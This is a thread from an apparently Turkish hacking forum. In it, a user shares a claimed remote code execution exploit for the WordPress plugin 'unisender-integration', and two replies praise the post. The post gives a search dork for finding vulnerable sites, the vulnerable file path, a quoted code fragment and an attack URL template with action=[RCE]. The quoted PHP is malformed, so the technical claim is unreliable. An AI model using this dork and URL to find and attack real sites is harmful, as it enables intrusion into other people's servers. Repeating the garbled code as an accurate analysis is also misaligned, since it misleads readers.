[EXPLOIT] Wordpress RCE Vuln Plugin (1 Viewer)

[Morningstar]

Önceki konuda xss zaafiyeti bulunduran exploiti paylaşmıştım, rce ile devam ediyoruz.

Zaafiyete neden olan plugin;
unisender-integration

Dork : inurl:wp-content/plugins/unisender-integration-master/class/

Zaafiyet path;
/wp-content/plugins/unisender-integration-master/class/UnisenderContactList.php

Zaafiyete neden olan kod;
13: $action = !$_GET['action'] : 'index'; 14: $method = 'action' . ucfirst($action); 16: $method $method();

Kullanım;

http://site.com/wp-content/plugins/unisender-integration-master/class/UnisenderContactList.php?action=[RCE]

Bu içeriği görmek için giriş yapın.

Giriş yap TG Destek Chat

 

[SHuTTeRLooK]

Güzel konu

Bu içeriği görmek için giriş yapın.

Giriş yap TG Destek Chat

 

[Z3DX]

Eline sağlık

Bu içeriği görmek için giriş yapın.

Giriş yap TG Destek Chat